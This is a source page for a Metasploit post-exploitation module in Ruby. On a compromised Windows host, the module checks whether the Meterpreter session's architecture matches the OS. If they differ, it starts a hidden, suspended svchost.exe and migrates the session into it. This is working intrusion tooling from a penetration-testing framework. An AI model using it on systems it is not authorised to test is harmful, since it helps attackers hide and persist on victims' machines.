Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/archmigrate.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Post::File8include Msf::Post::Common9include Msf::Post::Windows::Priv1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Architecture Migrate',16'Description' => %q{17This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a18new process with the correct architecture and migrates into that process.19},20'License' => MSF_LICENSE,21'Author' => ['Koen Riepe ([email protected])'],22'References' => [''],23'Platform' => [ 'win' ],24'Arch' => [ 'x86', 'x64' ],25'SessionTypes' => [ 'meterpreter' ],26'Compat' => {27'Meterpreter' => {28'Commands' => %w[29core_migrate30stdapi_railgun_api31stdapi_sys_process_execute32stdapi_sys_process_getpid33]34}35}36)37)3839register_options(40[41OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),42OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),43OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have SYSTEM privileges', false])44],45self.class46)47end4849def check_32_on_6450apicall = session.railgun.kernel32.IsWow64Process(-1, 4)['Wow64Process']51# railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.52if apicall == "\x00\x00\x00\x00"53migrate = false54else55migrate = true56end57return migrate58rescue StandardError59print_error('Railgun not available, this module only works for binary meterpreters.')60end6162def get_windows_loc63apicall = session.railgun.kernel32.GetEnvironmentVariableA('Windir', 255, 255)['lpBuffer']64windir = apicall.split(':')[0]65return windir66end6768def do_migrate69if check_32_on_6470print_status('The meterpreter is not the same architecture as the OS! Upgrading!')71newproc = datastore['EXE']72if exist?(newproc)73print_status("Starting new x64 process #{newproc}")74pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid75print_good("Got pid #{pid}")76print_status('Migrating..')77session.core.migrate(pid)78if pid == session.sys.process.getpid79print_good('Success!')80else81print_error('Migration failed!')82end83else84print_error('The selected executable to migrate into does not exist')85if datastore['FALLBACK']86windir = get_windows_loc87newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"88if exist?(newproc)89print_status("Starting new x64 process #{newproc}")90pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid91print_good("Got pid #{pid}")92print_status('Migrating..')93session.core.migrate(pid)94if pid == session.sys.process.getpid95print_good('Success!')96else97print_error('Migration failed!')98end99end100end101end102else103print_good('The meterpreter is the same architecture as the OS!')104end105end106107def run108if datastore['IGNORE_SYSTEM']109do_migrate110elsif !datastore['IGNORE_SYSTEM'] && is_system?111print_error('You are running as SYSTEM! Aborting migration.')112elsif datastore['IGNORE_SYSTEM'] && is_system?113print_error('You are running as SYSTEM! You will lose your privileges!')114do_migrate115elsif !datastore['IGNORE_SYSTEM'] && !is_system?116print_status('You\'re not running as SYSTEM. Moving on...')117do_migrate118end119end120end121122123